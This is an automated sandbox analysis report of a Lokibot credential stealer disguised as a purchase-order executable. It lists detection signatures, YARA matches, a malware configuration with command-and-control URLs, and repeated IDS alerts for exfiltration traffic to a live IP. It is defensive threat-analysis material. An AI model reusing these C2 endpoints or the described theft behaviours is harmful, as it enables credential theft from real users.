Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Order #5000012803.exe

Overview

General Information

Sample Name:Purchase Order #5000012803.exe
Analysis ID:553040
MD5:d62b8a5fdb90e9241ff0eef6ea035e32
SHA1:4e9e38dc4d01a649d927a933488477c5980fcb18
SHA256:95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.0.Purchase Order #5000012803.exe.400000.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13e78:$s1: http://
        • 0x17633:$s1: http://
        • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13e80:$s2: https://
        • 0x13e78:$f1: http://
        • 0x17633:$f1: http://
        • 0x13e80:$f2: https://
        1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.0.Purchase Order #5000012803.exe.400000.3.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.0.Purchase Order #5000012803.exe.400000.3.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 83 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Purchase Order #5000012803.exeReversingLabs: Detection: 25%
              Antivirus detection for URL or domainShow sources
              Source: http://slimpackage.com/slimfit/five/fre.phpAvira URL Cloud: Label: malware
              Machine Learning detection for sampleShow sources
              Source: Purchase Order #5000012803.exeJoe Sandbox ML: detected
              Source: 1.0.Purchase Order #5000012803.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
              Source: Purchase Order #5000012803.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49766 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49841 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49842 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49843 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49845 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49846 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49852 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49857 -> 104.223.93.105:80
